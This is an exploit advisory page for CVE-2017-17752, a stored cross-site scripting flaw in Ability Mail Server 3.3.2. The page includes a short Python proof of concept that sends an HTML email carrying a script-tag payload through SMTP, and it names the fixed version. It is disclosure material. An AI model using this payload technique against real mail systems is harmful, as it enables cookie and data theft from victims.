Ability Mail Server 3.3.2 Cross-Site Scripting

2017.12.21
Credit: Aloyce J. Makalanga
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2017-17752
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Ability Mail Server 3.3.2 Persistent Cross Site Scripting (XSS) # CVE: CVE-2017-17752 # Date: 19-12-2017 # Software Link: http://download.codecrafters.com/ams3.exe # Exploit Author: Aloyce J. Makalanga # Contact: https://twitter.com/aloycemjr # Vendor Homepage: http://www.codecrafters.com # Category: webapps # Attack Type: Remote # Impact: Data/Cookie theft 1. Description Ability Mail Server 3.3.2 has Persistent Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). To exploit the vulnerability, the victim must open an email with malicious Javascript inserted into the body of the email. 2. Proof of Concept #!/usr/bin/env python email_addr = 'hacker@evil.local' email = 'From: %s\n' % email_addr email += 'To: %s\n' % email_addr email += 'Subject: XSS\n' email += 'Content-type: text/html\n\n' email +='<script>alert(1)</script>' s = smtplib.SMTP('<Attacker IP address', 25) s.login(email_addr, "password") s.sendmail(email_addr, email_addr, email) s.quit() 3. Solution: Update to version 4.2.4 http://download.codecrafters.com/ams.exe


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top